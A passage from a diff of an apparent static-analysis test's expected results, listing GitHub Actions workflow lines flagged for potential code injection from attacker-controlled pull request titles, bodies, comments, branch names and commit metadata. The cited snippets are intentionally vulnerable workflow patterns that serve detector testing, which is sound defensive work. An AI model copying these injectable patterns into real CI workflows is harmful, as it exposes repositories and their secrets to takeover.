.github/workflows/test13.yml | -| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | -| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | -| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | -| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | -| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | -| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | -| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | -| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | -| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | -| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | -| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | -| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | -| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | -| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | -| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | -| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | .github/workflows/test18.yml | -| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | .github/workflows/test.yml | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout1.yml | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches3.yml | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches5.yml | +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | 